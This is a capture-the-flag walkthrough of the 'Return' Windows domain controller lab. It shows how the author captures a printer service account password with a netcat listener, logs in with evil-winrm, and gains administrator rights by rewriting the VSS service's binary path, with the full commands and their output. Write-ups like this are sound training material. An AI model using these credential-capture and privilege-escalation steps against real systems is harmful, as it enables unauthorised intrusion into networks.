Return


Contents

Intro


Return is an easy Windows machine which acts as a Domain Controller, hosting a network printer, from which you can gain authentication. Once on the machine, we make use of what groups the user is in.

User


Nmap returns us a handful of open ports. DNS' port 53, Kerberos' port 88, and lastly LDAP's port 389/3268 indicate that this machine serves as a domain controller:

sudo nmap -sC -sV 10.129.95.241

53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-04-29 11:58:35Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)

Port 80 hosts a printer admin panel running PHP.

Fax and Troubleshooting do nothing when interacted with. Settings on the other hand, exposes the printer's configuration, with the username being svc-printer, and password being blanked out - viewing page source didn't show it either.

This got me thinking however - instead of the printer's address, could I put my own IP address in and get additional information worth noting down? I set up a listener via sudo nc -lvnp 389.

The listener caught what's supposedly a password: 1edFg43012!!. With a username and password in our hands, logging in is the next step, using evil-winrm:

evil-winrm -i 10.129.95.241 -u svc-printer -p '1edFg43012!!'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-printer\Documents>

The user flag is found on svc-printer's desktop.

Root


Gathering info:

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> whoami /all

USER INFORMATION
----------------

User Name          SID
================== =============================================
return\svc-printer S-1-5-21-3750359090-2939318659-876128439-1103


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators                   Alias            S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeLoadDriverPrivilege         Load and unload device drivers      Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Inside of groups, Server Operators sticks out. With this group, we can modify services:

*Evil-WinRM* PS C:\Users\svc-printer> tasklist /svc
tasklist.exe : ERROR: Access denied
    + CategoryInfo          : NotSpecified: (ERROR: Access denied:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

*Evil-WinRM* PS C:\Users\svc-printer> sc.exe query state=all
\[SC] OpenSCManager FAILED 5:

Access is denied.

Since neither of these worked, I tried using winpeas to find out what services are running - the goal is to find a useful one running as system:

*Evil-WinRM* PS C:\Users\svc-printer> upload winPEASany.exe C:\Users\svc-printer
                                        
Info: Uploading winPEASany.exe to C:\Users\svc-printer
                                        
Data: 14822056 bytes of 14822056 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-printer> ./winPEASany.exe
"Check if you can modify the registry of a service"

HKLM\system\currentcontrolset\services\VSS (Server Operators [Allow: WriteKey GenericWrite])

VSS is worth digging into when attacking domain controllers. I looked at the its configuration next to see if there was anything I could change:

*Evil-WinRM* PS C:\Users\svc-printer> sc.exe qc vss
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: vss
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\system32\vssvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Volume Shadow Copy
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem

We can change the binary path to our liking! There are two ways we could go about this however, either via adding svc-printer to the group of administrators, done from a command prompt, or by spawning a reverse shell from an uploaded .exe generated by msfvenom. Both would work, since the service runs as system, but to spare myself some time I went with the first option today:

*Evil-WinRM* PS C:\Users\svc-printer> sc.exe config vss binpath="C:\windows\system32\cmd.exe /c net localgroup administrators svc-printer /add"
[SC] ChangeServiceConfig SUCCESS
*Evil-WinRM* PS C:\Users\svc-printer> sc.exe stop vss
[SC] ControlService FAILED 1062:

The service has not been started.

*Evil-WinRM* PS C:\Users\svc-printer> sc.exe start vss
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

*Evil-WinRM* PS C:\Users\svc-printer> net localgroup administrators

Members

-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
svc-printer

If we log back on using evil-winrm, we'll get system access! Good luck to anyone else popping this box!